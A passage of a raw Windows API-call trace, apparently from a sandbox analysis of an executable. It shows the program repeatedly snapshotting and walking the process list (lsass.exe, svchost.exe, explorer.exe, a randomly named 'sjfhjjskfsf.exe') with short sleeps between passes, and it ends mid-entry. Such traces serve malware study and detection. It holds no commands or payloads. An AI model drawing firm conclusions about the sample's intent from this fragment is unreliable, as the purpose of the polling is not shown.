th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.072] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0219.072] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0219.072] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.072] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0219.073] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.073] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0219.073] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0219.073] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0219.074] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0219.074] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.074] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.075] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.075] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.075] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.075] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0219.076] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.076] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.076] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0219.077] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0219.077] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.077] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0219.077] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0219.078] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.078] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0219.078] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0219.078] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0219.079] Process32NextW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0219.079] Sleep (dwMilliseconds=0x64) [0219.210] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e4 [0219.212] Process32FirstW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.212] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0219.212] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0219.213] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.213] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0219.213] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.213] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0219.214] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0219.214] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0219.214] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0219.215] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.215] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.215] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.216] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.216] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.216] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0219.217] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.217] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.217] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0219.218] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0219.218] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.219] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0219.219] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0219.219] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.219] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0219.220] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0219.220] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0219.220] Process32NextW (in: hSnapshot=0x1e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0219.221] Sleep (dwMilliseconds=0x64) [0219.319] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e8 [0219.321] Process32FirstW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.321] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0219.321] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0219.322] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.322] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0219.322] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.323] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0219.323] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0219.323] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0219.323] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0219.324] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.324] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.324] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.324] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.325] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.325] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0219.325] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.326] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.326] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0219.326] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0219.326] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.327] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0219.327] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0219.327] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.327] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0219.328] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0219.328] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, 